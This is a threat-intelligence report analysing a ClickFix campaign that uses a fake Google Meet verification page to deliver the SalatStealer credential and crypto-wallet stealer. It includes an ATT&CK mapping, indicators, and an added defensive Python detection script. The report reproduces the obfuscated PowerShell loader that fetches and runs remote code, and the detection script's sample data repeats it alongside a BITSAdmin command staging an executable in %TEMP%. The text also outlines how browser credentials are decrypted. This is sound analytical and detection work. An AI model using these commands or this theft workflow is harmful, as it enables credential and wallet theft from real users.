
ClickFix-style social engineering campaigns continue to evolve as threat actors increasingly rely on legitimate Windows utilities and user-assisted execution to evade traditional security controls. In this campaign, attackers impersonate Google Meet through a fraudulent verification portal that tricks victims into executing an obfuscated PowerShell command via the Windows Run dialog.
The infection chain deploys a multi-stage malware workflow leveraging PowerShell and BITSAdmin to retrieve and execute SalatStealer, a Golang-based information stealer targeting browser credentials, session cookies, and cryptocurrency wallet data.
Analysis revealed credential theft functionality targeting Chromium- and Gecko-based browsers, browser extension wallet storage, LevelDB databases, and outbound communication with attacker-controlled infrastructure.
This report examines the infection workflow, PowerShell staging mechanisms, browser credential decryption behavior, wallet theft functionality, and network communication observed during static and dynamic analysis.

The observed infection chain follows a multi-stage execution workflow designed to abuse legitimate Windows functionality while minimizing detection visibility.
The fraudulent verification portal was hosted at online-meet[.]com. The campaign relies entirely on user-assisted execution rather than exploiting software vulnerabilities: victims interacting with the fake Google Meet verification page are instructed to open the Windows Run dialog (Win + R) and execute a malicious PowerShell command.
powershell -W H -C "$a='i';$b='wr';$c='ie';$d='x';&($c+$d)((&($a+$b) 'https://online-meet.com' -UseB).Content)"
The command launches a hidden PowerShell process and retrieves a remote payload directly into memory using dynamically reconstructed Invoke-WebRequest (IWR) and Invoke-Expression (IEX) commands.
This lightweight obfuscation technique reduces static detection visibility while enabling transient PowerShell-based payload staging.
No evidence of privilege escalation or kernel-level exploitation was observed during execution. The infection chain relies entirely on legitimate Windows utilities and user-assisted execution.

Once executed, the PowerShell loader retrieves a secondary script directly into memory and initiates staged malware delivery.
The downloader abuses BITSAdmin, a legitimate Windows LOLBin (Living Off-the-Land Binary), to retrieve the next-stage payload from attacker-controlled infrastructure and store it within the %TEMP% directory as:
GoogleMeetHelper.exe
Following successful download verification, the malware launches the executable as a detached background process using obfuscated command construction to reduce process visibility.
The downloaded executable was identified as a UPX-packed Golang-based SalatStealer payload.
Analysis of the binary revealed characteristics commonly associated with Golang malware, including statically linked dependencies, Golang runtime artifacts, and broad embedded string references associated with browser and wallet targeting.
Static analysis revealed embedded browser profile enumeration routines and hardcoded wallet directory references within the Golang binary. Additional analysis identified logic associated with Chromium SQLite database access and LevelDB parsing routines commonly used by browser-based cryptocurrency wallets.
To prevent multiple concurrent executions on the infected host, the malware creates the mutex:
WEBR_BGN6AJB4TDY6
If the mutex already exists, execution terminates; this prevents duplicate instances and reduces operational instability on the infected host.

SalatStealer enumerates browser profile directories associated with Chromium- and Gecko-based browsers to access stored credentials, cookies, autofill data, and session artifacts.
For Chromium-based browsers, the malware extracts the encrypted browser master key from the Local State file and decrypts it with the Windows DPAPI function CryptUnprotectData. The recovered key is then used to decrypt the AES-GCM-encrypted credential and cookie values stored in the browser's SQLite databases.
Targeted browser artifacts include:
- Login Data
- Web Data
- Network\Cookies

The malware supports a broad set of browsers, expanding credential theft capability across both mainstream and niche browser families.


In addition to browser credential theft, SalatStealer targets cryptocurrency wallet storage locations and browser-extension-based wallet data.
The malware maintains a hardcoded list of wallet directories and associated browser extension storage paths, enabling theft of both standalone wallet artifacts and browser-based cryptocurrency data.
Analysis also revealed targeting of LevelDB databases commonly used by browser extensions to store authentication tokens, wallet metadata, and session information.


Network telemetry revealed repeated outbound encrypted communication with attacker-controlled infrastructure at:
185[.]213[.]240[.]179
The recurring bidirectional communication pattern indicates active command-and-control activity likely associated with beaconing and exfiltration of harvested browser and wallet data.

SOC teams should monitor for:
- powershell.exe launched from explorer.exe
- -W H / -WindowStyle Hidden
- Invoke-Expression (IEX)
- IWR and IEX used together

| Tactic | Technique ID | Technique Name | Observed Activity |
| --- | --- | --- | --- |
| Initial Access | T1204 | User Execution | Victim was socially engineered into executing a malicious PowerShell command via the Windows Run dialog |
| Execution | T1059.001 | PowerShell | Obfuscated PowerShell used to download and execute malicious payloads in memory |
| Defense Evasion | T1027 | Obfuscated Files or Information | PowerShell commands reconstructed dynamically using string concatenation to evade detection |
| Defense Evasion | T1197 | BITS Jobs | BITSAdmin abused as a LOLBin to stealthily download the next-stage payload |
| Defense Evasion | T1027.002 | Software Packing | Stage-2 SalatStealer payload was packed using UPX |
| Defense Evasion | T1497.001 | System Checks | Malware created mutex WEBR_BGN6AJB4TDY6 to avoid multiple executions |
| Credential Access | T1555.003 | Credentials from Web Browsers | Browser credentials, autofill data, and login databases harvested from Chromium-based browsers |
| Credential Access | T1539 | Steal Web Session Cookie | Chromium Network\Cookies databases targeted for session cookie theft |
| Collection | T1005 | Data from Local System | Cryptocurrency wallet files and browser extension data collected from local storage |
| Collection | T1213 | Data from Information Repositories | LevelDB databases targeted to extract wallet/session/token information |
| Command and Control | T1105 | Ingress Tool Transfer | Additional payloads downloaded from remote infrastructure during execution |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Stolen browser and cryptocurrency data likely exfiltrated through C2 communication channels |
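A defender-side triage script for the SOC monitoring indicators listed above, added here as an example that is not part of the original report: it resolves the &($a+$b) string-concatenation trick so the IEX/IWR signatures fire on the command the loader actually runs, flags hidden-window PowerShell spawned by explorer.exe, and flags BITSAdmin transfers that land an executable in %TEMP%. The Sysmon-style events, the %TEMP% path and the download URL are constructed sample data.

```python
import re
# Constructed Sysmon-style process creation events (sample data, not from the report).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # ClickFix loader pasted into the Run dialog, as described in the report
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -W H -C \"$a='i';$b='wr';$c='ie';$d='x';"
                    "&($c+$d)((&($a+$b) 'https://online-meet.com' -UseB).Content)\""},
    # BITSAdmin staging the next stage into %TEMP% (download URL is a placeholder)
    {"ParentImage": PS, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download https://example.invalid/s2 "
                    r"C:\Users\u\AppData\Local\Temp\GoogleMeetHelper.exe"},
    # Benign scheduled script: should produce no hits
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")                  # $a='i'
CONCAT_RE = re.compile(r"&\s*\(\s*((?:\$\w+\s*\+\s*)+\$\w+)\s*\)")  # &($a+$b)
RAW_RULES = {  # signatures evaluated on the command line as logged
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden|id)?\b"),
    "concat_obfuscation": CONCAT_RE,
}
CLEAN_RULES = {  # signatures evaluated after deobfuscation
    "iex": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "iwr": re.compile(r"(?i)\b(?:iwr|invoke-webrequest)\b"),
}
TEMP_EXE_RE = re.compile(r"(?i)\\temp\\\S*\.exe\b")

def deobfuscate(cmdline):
    """Resolve the &($x+$y) concatenation trick back to the cmdlet name the loader runs."""
    assigned = dict(ASSIGN_RE.findall(cmdline))
    def resolve(m):
        return "".join(assigned.get(n, "$" + n) for n in re.findall(r"\$(\w+)", m.group(1)))
    return CONCAT_RE.sub(resolve, cmdline)

def analyze(event):
    """Return the sorted list of rule names a process-creation event triggers."""
    parent, image = event["ParentImage"].lower(), event["Image"].lower()
    raw = event["CommandLine"]
    hits = set()
    if image.endswith("powershell.exe"):
        if parent.endswith("explorer.exe"):  # Run dialog / shell-launched PowerShell
            hits.add("powershell_from_explorer")
        clean = deobfuscate(raw)
        hits |= {name for name, rx in RAW_RULES.items() if rx.search(raw)}
        hits |= {name for name, rx in CLEAN_RULES.items() if rx.search(clean)}
    if image.endswith("bitsadmin.exe") and "/transfer" in raw.lower() and TEMP_EXE_RE.search(raw):
        hits.add("bitsadmin_temp_exe")
    return sorted(hits)
```

Feed real process-creation telemetry in the same three-field shape; any event that trips several rules at once (hidden window plus concatenation plus IEX/IWR) is the ClickFix pattern and deserves immediate triage.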
File Hashes (SHA-256)

| IOC | Name |
| --- | --- |
| a7962ffda8cc0277c013ffd4bd4328e31aea8206b8379a0b574e05a5e5152812 | clickfix.ps1 |
| 8a132e7dd4876c87b5c425db32291bd54a2f3a477c78ceb4d29f297867a150fa | SalatStealer |

C2 URL

| Indicator | Type |
| --- | --- |
| https://online-meet.com | URL |
| 185.213.240.179 | IP Address |
This campaign demonstrates how ClickFix-style social engineering continues to evolve through abuse of legitimate Windows tooling and user-assisted execution workflows. Rather than relying on software exploitation, the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer while minimizing traditional detection opportunities.
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise. Detection efforts should prioritize behavioral monitoring of PowerShell execution, LOLBin abuse, anomalous browser database access, and suspicious executable activity originating from user-writable directories.
Contributors:
Pandurang Terkar

Rudra Pratap
